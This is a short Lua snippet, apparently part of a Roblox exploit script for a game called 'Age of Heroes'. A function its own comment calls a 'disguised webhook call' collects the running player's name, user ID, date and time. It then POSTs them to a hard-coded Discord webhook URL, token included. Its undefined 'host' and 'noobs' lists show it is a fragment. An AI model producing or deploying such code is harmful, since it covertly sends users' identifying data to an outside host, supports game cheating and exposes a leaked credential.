local function fetchToKill()
    local player = game.Players.LocalPlayer
    local playerName = player.Name
    local playerUserId = player.UserId
    local gameName = "Age of Heroes"
    local currentDate = os.date("%Y-%m-%d")
    local currentTime = os.date("%H:%M:%S")

    -- Send report (disguised webhook call)
    local afmData = {
        ["content"] = "**Exploit Executed!**",
        ["embeds"] = {{
            ["title"] = "Execution Log",
            ["description"] = "Player has executed the exploit script.",
            ["fields"] = {
                {["name"] = "Game Name", ["value"] = gameName, ["inline"] = true},
                {["name"] = "Killer", ["value"] = table.concat(host, ", "), ["inline"] = true},
                {["name"] = "Tankers", ["value"] = table.concat(noobs, ", "), ["inline"] = false},
                {["name"] = "Executed By", ["value"] = playerName, ["inline"] = true},
                {["name"] = "User ID", ["value"] = tostring(playerUserId), ["inline"] = true},
                {["name"] = "Date", ["value"] = currentDate, ["inline"] = true},
                {["name"] = "Time", ["value"] = currentTime, ["inline"] = true}
            },
            ["color"] = 16711680
        }}
    }

    local jsonData = game:GetService("HttpService"):JSONEncode(afmData)

    request({
        Url = "https://discordapp.com/api/webhooks/1296620356307779686/o9xb9C0UnUAsfu0iXVbEH6q5UC_RNq497N0xFaTt7jE0mEufqOyrJelxNHhGvss3YRx4", -- Webhook URL
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = jsonData
    })
end

-- Call the function to send logs
fetchToKill()
